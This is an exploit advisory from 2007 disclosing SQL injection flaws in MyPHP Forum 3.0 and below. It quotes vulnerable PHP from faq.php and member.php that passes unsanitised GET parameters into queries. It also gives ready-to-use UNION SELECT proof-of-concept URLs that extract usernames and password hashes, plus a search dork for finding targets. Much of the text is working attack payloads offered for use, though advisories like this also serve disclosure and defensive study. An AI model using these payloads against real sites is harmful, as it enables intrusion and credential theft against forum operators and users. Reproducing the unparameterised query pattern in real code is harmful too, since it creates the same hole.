MyPHP Forum versions 3.0 and below suffer from multiple SQL injection vulnerabilities.
1fa8e47bceeab90f65d0b10d450f56383f090bce02fde02ee8a0a341f3ad1d4a
Name : MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability
Author : x0kster
Email : x0kster@gmail.com
Site : ihteam.net
Script Download : http://www.myphp.ws/
Date : 31/12/2007
Dork : "Powered by: MyPHP Forum"
Note:
For work, magic_quotes_gpc must be turned off on the server.
Usally the table prefix is 'nb'.
Sql injection in faq.php
<?php
//faq.php
[...]
$id = $_GET['id'];
if($action == "view" && !empty($id)) {
$result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- So miss a control :-D
$row = mysql_fetch_array($result);
$row[answer] = postify($row[answer]);
[...]
?>
So we can execute an sql injection thrught the bugged variable $id.
PoC:
http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*
Sql injection in member.php
<?php
//member.php
[...]
if($action == "viewpro") {
$member = $HTTP_GET_VARS['member'];
$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
[...]
?>
So $member variable isn't controlled so we can exploit it.
PoC:
http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*